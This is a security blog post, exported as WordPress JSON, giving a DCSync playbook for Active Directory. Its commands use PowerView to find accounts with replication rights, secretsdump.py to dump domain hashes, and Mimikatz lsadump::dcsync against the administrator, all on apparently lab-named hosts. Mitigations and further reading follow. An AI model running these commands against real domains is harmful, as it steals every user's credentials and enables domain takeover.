{"id":217,"date":"2025-01-23T00:00:00","date_gmt":"2025-01-22T23:00:00","guid":{"rendered":"https:\/\/kosokoking.com\/?p=217"},"modified":"2025-01-19T19:22:10","modified_gmt":"2025-01-19T18:22:10","slug":"dcsync-attack-playbook","status":"publish","type":"post","link":"https:\/\/kosokoking.com\/index.php\/security\/dcsync-attack-playbook\/","title":{"rendered":"DCSync Attack Playbook"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">This playbook provides a comprehensive guide on the DCSync attack, its mechanics, detection methods, and mitigation strategies.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">What is DCSync?<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">DCSync is a technique used to steal the Active Directory password database by exploiting the Directory Replication Service Remote Protocol. It allows an attacker to impersonate a Domain Controller and retrieve user NTLM password hashes.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">How DCSync Works<\/h2>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li>The attacker uses an account with domain replication rights.<\/li>\n\n\n\n<li>They request password replication from a Domain Controller using the DS-Replication-Get-Changes-All extended right.<\/li>\n\n\n\n<li>This allows retrieval of NTLM password hashes for any domain user, including previous password hashes.<\/li>\n<\/ol>\n\n\n\n<h2 class=\"wp-block-heading\">Required Permissions<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">To perform a DCSync attack, an account must have the following permissions:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Replicating Directory Changes<\/li>\n\n\n\n<li>Replicating Directory Changes All<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Note<\/strong>: Domain\/Enterprise Admins and default domain administrators have these rights by default.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Detection and Enumeration<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Using PowerView<\/strong><\/p>\n\n\n\n
<ol start=\"1\" class=\"wp-block-list\">\n<li>Identify the user&#8217;s SID:<\/li>\n<\/ol>\n\n\n\n<pre class=\"wp-block-code\"><code>Get-DomainUser -Identity adunn | select samaccountname,objectsid,memberof,useraccountcontrol | fl<\/code><\/pre>\n\n\n\n<ol start=\"2\" class=\"wp-block-list\">\n<li>Check replication rights:<\/li>\n<\/ol>\n\n\n\n<pre class=\"wp-block-code\"><code>$sid = \"S-1-5-21-3842939050-3880317879-2865463114-1164\"<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>Get-ObjectAcl \"DC=inlanefreight,DC=local\" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get') } | ? { $_.SecurityIdentifier -match $sid } | select AceQualifier, ObjectDN, ActiveDirectoryRights, SecurityIdentifier, ObjectAceType | fl<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Executing DCSync<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Using secretsdump.py (Linux)<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT\/adunn@172.16.5.5<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Options<\/strong>:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>-just-dc-ntlm: Extract only NTLM hashes<\/li>\n\n\n\n<li>-just-dc-user &lt;USERNAME&gt;: Extract data for a specific user<\/li>\n\n\n\n<li>-pwd-last-set: Show password last change date<\/li>\n\n\n\n<li>-history: Dump password history<\/li>\n\n\n\n<li>-userstatus: Check if a user is disabled<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Using Mimikatz (Windows)<\/strong><\/p>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li>Run PowerShell as the user with DCSync privileges:<\/li>\n<\/ol>\n\n\n\n<pre class=\"wp-block-code\"><code>runas \/netonly \/user:INLANEFREIGHT\\adunn powershell<\/code><\/pre>\n\n\n\n<ol start=\"2\" class=\"wp-block-list\">\n<li>Execute Mimikatz commands:<\/li>\n<\/ol>\n\n\n\n<pre class=\"wp-block-code\"><code>.\\mimikatz.exe<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>privilege::debug<\/code><\/pre>\n\n\n\n
<pre class=\"wp-block-code\"><code>lsadump::dcsync \/domain:INLANEFREIGHT.LOCAL \/user:INLANEFREIGHT\\administrator<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Additional Considerations<\/h2>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li><strong>Reversible Encryption<\/strong>: Some accounts may have passwords stored using reversible encryption. Enumerate these accounts:<\/li>\n<\/ol>\n\n\n\n<pre class=\"wp-block-code\"><code># 128 (0x80) is the ENCRYPTED_TEXT_PWD_ALLOWED bit of userAccountControl\nGet-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl<\/code><\/pre>\n\n\n\n<ol start=\"2\" class=\"wp-block-list\">\n<li><strong>Password Audits<\/strong>: DCSync can be used for legitimate password audits. However, ensure proper authorisation and documentation.<\/li>\n<\/ol>\n\n\n\n<h2 class=\"wp-block-heading\">Mitigation Strategies<\/h2>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li>Limit accounts with replication rights<\/li>\n\n\n\n<li>Implement strong access controls<\/li>\n\n\n\n<li>Monitor for unusual replication requests<\/li>\n\n\n\n<li>Use Advanced Threat Analytics or similar tools to detect DCSync attempts<\/li>\n\n\n\n<li>Regularly audit accounts with sensitive permissions<\/li>\n<\/ol>\n\n\n\n<h2 class=\"wp-block-heading\">Recommended Reading<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/docs.microsoft.com\/en-us\/windows-server\/identity\/ad-ds\/get-started\/replication\/active-directory-replication-concepts\" target=\"_blank\" rel=\"noreferrer noopener\">Microsoft Documentation on Active Directory Replication<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/attack.mitre.org\/techniques\/T1003\/006\/\" target=\"_blank\" rel=\"noreferrer noopener\">MITRE ATT&amp;CK: DCSync<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/adsecurity.org\/?p=1729\" target=\"_blank\" rel=\"noreferrer noopener\">Detecting DCSync Attacks<\/a><\/li>\n<\/ul>\n\n\n\n
<p class=\"wp-block-paragraph\">By following this playbook, organisations can better understand, detect, and mitigate DCSync attacks, enhancing their overall Active Directory security posture.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>This playbook provides a comprehensive guide on the DCSync attack, its mechanics, detection methods, and mitigation strategies.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[149,151,51,150,152,157,153,154,156,155],"class_list":["post-217","post","type-post","status-publish","format-standard","hentry","category-security","tag-active-directory","tag-credential-theft","tag-cybersecurity","tag-dcsync","tag-hacking","tag-lateral-movement","tag-mimikatz","tag-network-security-2","tag-privilege-escalation","tag-windows-security"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/posts\/217","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/comments?post=217"}],"version-history":[{"count":1,"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/posts\/217\/revisions"}],"predecessor-version":[{"id":218,"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/posts\/217\/revisions\/218"}],"wp:attachment":[{"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/media?parent=217"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/categories?post=217"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/tags?post=217"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}